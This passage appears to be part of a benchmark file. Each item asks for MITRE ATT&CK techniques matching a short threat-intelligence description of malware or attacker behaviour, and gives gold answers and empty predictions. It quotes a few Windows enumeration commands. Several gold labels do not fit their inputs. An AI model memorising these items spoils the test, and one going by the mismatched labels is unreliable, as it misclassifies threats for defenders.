mechanisms.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: Agent Tesla has dropped RegAsm.exe onto systems for performing malicious activity.\n\t - T1218.009: System Binary Proxy Execution - Regsvcs/Regasm\n", "input": "\nhas been seen persisting via COM hijacking through replacement of the COM object for MruPidlList {42aedc87-2188-41fd-b9a3-0c966feabec1} or Microsoft WBEM New Event Subsystem {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} depending on the system's CPU architecture.", "gold": "- T1546.015: Event Triggered Execution - Component Object Model Hijacking", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chimera has encapsulated Cobalt Strike's C2 protocol in DNS and HTTPS.\n\t - T1572: Protocol Tunneling\n- Text: Cobian RAT uses DNS for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: Shark can update its configuration to use a different C2 server.\n\t - T1008: Fallback Channels\n", "input": "\nOnce the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails", "gold": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.\n\t - T1112: Modify Registry\n- Text: One variant of creates a new service using either a hard-coded or randomly generated name.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Impacket contains various modules emulating other service execution tools such as PsExec.\n\t - T1569.002: System Services - Service Execution\n", "input": "\nOnce Shellex is called, it first passes each of the items in the config buffer to their own strings.\u00a0 Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists.\u00a0 If so, it opens it using service manager.\u00a0 If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe.\u00a0 Next, it creates the service and runs it.\u00a0 Once the service is running, it creates a new mutex using [C2URL]:[PORT] and connects to the C2 server.\u00a0 It then sends the Implant_Heartbeat opcode, and then calls its payload function to grab Version Information (x86 and x64) Host information SystemInfo Processor Count and Write Speed Global Memory Status before formatting it, altering the InstallTime subkey, and sending all of the information back to its C2 in the Implant_Login buffer", "gold": "- T1082: System Information Discovery\n- T1543.003: Create or Modify System Process - Windows Service\n- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: USBferry can detect the victim's file or folder list.\n\t - T1083: File and Directory Discovery\n- Text: Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.\n\t - T1595.003: Active Scanning - Wordlist Scanning\n", "input": "\ncan enumerate files and directories.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FELIXROOT collects information about the network including the IP address and DHCP server.\n\t - T1016: System Network Configuration Discovery\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.\n\t - T1592: Gather Victim Host Information\n\t - T1589: Gather Victim Identity Information\n\t - T1590: Gather Victim Network Information\n\t - T1125: Video Capture\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1056: Input Capture\n\t - T1113: Screen Capture\n\t - T1003: OS Credential Dumping\n", "input": "\ngathers and beacons the MAC and IP addresses during installation.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT29 has accessed victims\u2019 internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations.\n\t - T1213: Data from Information Repositories\n- Text: LAPSUS$ has searched a victim's network for collaboration platforms like SharePoint to discover further high-privilege account credentials.\n\t - T1213.002: Data from Information Repositories - Sharepoint\n- Text: SUNBURST collected information from a compromised host.\n\t - T1005: Data from Local System\n", "input": "\nThe tool would connect to the SQL SharePoint database and issue a query to dump all data from the database to a temporary file affixed with 'spdata'", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA).\u00a0The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe\n\t - T1218.005: System Binary Proxy Execution - Mshta\n\t - T1204.002: User Execution - Malicious File\n- Text: Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Gamaredon Group has embedded malicious macros in document templates, which executed VBScript. Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nThe emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing \u201cBabyShark\u201d", "gold": "- T1598.002: Phishing for Information - Spearphishing Attachment", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once successfully installed in a system, Trickbot will gather system information such as OS, CPU, and memory information, user accounts, lists of installed programs and services.\n\t - T1082: System Information Discovery\n- Text: WINERACK can gather information on the victim username.\n\t - T1033: System Owner/User Discovery\n- Text: HotCroissant has the ability to identify the IP address of the compromised machine.\n\t - T1016: System Network Configuration Discovery\n", "input": "\ncreates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Regin has used a hidden file system to store some of its components.\n\t - T1564.005: Hide Artifacts - Hidden File System\n", "input": "\nsaves itself with a leading \".\" to make it a hidden file.", "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gelsemium can use dynamic DNS domain names in C2.\n\t - T1568: Dynamic Resolution\n- Text: Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample\n\t - T1071.004: Application Layer Protocol - DNS\n\t - T1027: Obfuscated Files or Information\n- Text: Shark can send DNS C2 communications using a unique domain generation algorithm.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n", "input": "\nTo obtain strings to treat as commands, the payload will issue a series of DNS queries to resolve domains with the following structure: --. The C2 server will provide responses to these queries that contain answers in IPv4 or IPv6 addresses depending on the type of DNS query the payload uses to communicate with its C2 server", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1087.003: Account Discovery - Email Account\n- Text: KGH_SPY can collect credentials from WINSCP.\n\t - T1555: Credentials from Password Stores\n- Text: Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.\n\t - T1555.004: Credentials from Password Stores - Windows Credential Manager\n", "input": "\nVault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cachedump can extract cached password hashes from cache entry information.\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n- Text: FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: steals credentials stored in Web browsers by querying the sqlite database and leveraging the Windows Vault mechanism.\n\t - T1003: OS Credential Dumping\n", "input": "\nIn addition to these tools, we believe OilRig attackers obtained credentials through, bruteforcing, SQL injections, and using traditional credential harvesting toolkits as we discussed in the Striking Oil blog published in September 2017", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TDTESS provides a reverse shell on the victim.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: For that we can use a Python script, included in Appendix B \u2013 Python Scripts\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: APT19 used PowerShell commands to execute payloads.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nTraps provides endpoint protection, as it can block Excel from creating a command prompt process", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HermeticWizard has the ability to create a new process using `rundll32`.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards\n\t - T1204.002: User Execution - Malicious File\n\t - T1105: Ingress Tool Transfer\n", "input": "\nThis shortcut file points to the path of the previously written \u2018winhelp.cpl\u2019 file", "gold": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Green Lambert can collect the date and time from a compromised host.\n\t - T1124: System Time Discovery\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", "input": "\nhas the capability to obtain the time zone information and current timestamp of the victim\u2019s machine.", "gold": "- T1124: System Time Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n- Text: Quickly after the initial compromise, the operator deploys a tool named \"dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json\n\t - T1048: Exfiltration Over Alternative Protocol\n", "input": "\nexfiltrates files over FTP.", "gold": "- T1048: Exfiltration Over Alternative Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique\n\t - T1568: Dynamic Resolution\n- Text: Milan can use a custom protocol tunneled through DNS or HTTP.\n\t - T1572: Protocol Tunneling\n- Text: TEXTMATE uses DNS TXT records for C2.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\nIf both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling", "gold": "- T1071: Application Layer Protocol", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Lazarus Group has used code signing certificates issued by Sectigo RSA for some of its malware and tools.\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: PROMETHIUM has created self-signed certificates to sign malicious installers.\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", "input": "\nThe DLL is also digitally signed by a certificate from \u201cAirVPN\u201d", "gold": "- T1553.002: Subvert Trust Controls - Code Signing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ShadowPad has sent data back to C2 every 8 hours.\n\t - T1029: Scheduled Transfer\n- Text: Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1124: System Time Discovery\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Note that regardless of whether Nyetya is successful in overwriting the boot sector or not, it will proceed to create a scheduled task via schtasks to reboot the system one hour after infection\n\t - T1529: System Shutdown/Reboot\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\ncan be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.", "gold": "- T1029: Scheduled Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.\n\t - T1505.002: Server Software Component - Transport Agent\n- Text: prompts users for their credentials.\n\t - T1056: Input Capture\n- Text: Regin contains a keylogger.\n\t - T1056.001: Input Capture - Keylogging\n", "input": "\nactors installed a credential logger on Microsoft Exchange servers. also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Skidmap, a Linux malware that we recently stumbled upon, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.\n\t - T1588.001: Obtain Capabilities - Malware\n- Text: Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: Ducktail has now replaced the older NET Core information-stealing malware used in previous campaigns with one written in PHP.\n\t - T1587.001: Develop Capabilities - Malware\n", "input": "\nOrganizations that Buckeye targeted over time, per region Malware and tools Buckeye uses a number of hacking tools as well as malware", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN7 has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands.\n\t - T1027: Obfuscated Files or Information\n- Text: The Delphi variant of Zebrocy delivered in this attack campaign are very similar to the Delphi downloader discussed in our previous Zebrocy research published in June 2018. While this Delphi variant was known, the C# and VB.NET variants delivered in this attack campaign were previously unknown. An interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed. While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Bazar can hash then resolve API calls at runtime.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", "input": "\nhas obfuscated a script with Crypto Obfuscator.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has used \"net group \"Domain Admins\" /domain\" to identify domain administrators.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: may collect permission group information by running net group /domain or a series of other commands on a victim.\n\t - T1069: Permission Groups Discovery\n- Text: Commands under \"net user\" can be used in Net to gather information about and manipulate user accounts.\n\t - T1087.001: Account Discovery - Local Account\n", "input": "\nactors used the following command following exploitation of a machine with malware to list local groups: net localgroup administrator >> %temp%\\download", "gold": "- T1069: Permission Groups Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RTF documents sent in the observed campaigns contain exploits for several vulnerabilities in Microsoft Office, and they seem to be created using a version of an exploit toolkit, often referred to as Threadkit. Threadkit is not exclusively used by the actors behind the observed attacks but also by other groups utilizing various payloads, including Trickbot, Lokibot, SmokeLoader and some other banking malware. The embedded object triggers a download of an HTML page containing the VBScript that exploits the vulnerability and launches the shellcode. The HTML component of the exploit is based on the original exploit code discovered in May this year. CVE-2018-8174 VB script exploit code\n\t - T1203: Exploitation for Client Execution\n- Text: Once the initial computer on the targeted organization\u2019s network is infected with Vcrodat, Whitefly begins mapping the network and infecting further computers. The attackers rely heavily on tools such as Mimikatz to obtain credentials. Using these credentials, the attackers are able to compromise more machines on the network and, from those machines, again obtain more credentials\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1068: Exploitation for Privilege Escalation\n- Text: The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1587.004: Develop Capabilities - Exploits\n\t - T1499.004: Endpoint Denial of Service - Application or System Exploitation\n\t - T1190: Exploit Public-Facing Application\n\t - T1210: Exploitation of Remote Services\n\t - T1588.005: Obtain Capabilities - Exploits\n", "input": "\nThe attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113", "gold": "- T1068: Exploitation for Privilege Escalation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can establish persistence by setting the value \u201cShell\u201d with \u201cexplorer.exe, %malware_pathfile%\u201d under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: gh0st RAT has added a Registry Run key to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Nerex creates a Registry subkey that registers a new service.\n\t - T1112: Modify Registry\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\nA variant registers as a Winlogon Event Notify DLL to establish persistence.", "gold": "- T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell can check the services on the system.\n\t - T1007: System Service Discovery\n- Text: FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.\n\t - T1057: Process Discovery\n- Text: The malware component, test.exe, uses the Windows command \"cmd.exe\" /C whoami\u201d to verify it is running with the elevated privileges of \u201cSystem\u201d and creates persistence by creating the following scheduled task\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1033: System Owner/User Discovery\n", "input": "\ncollects a list of running services with the command tasklist /v.", 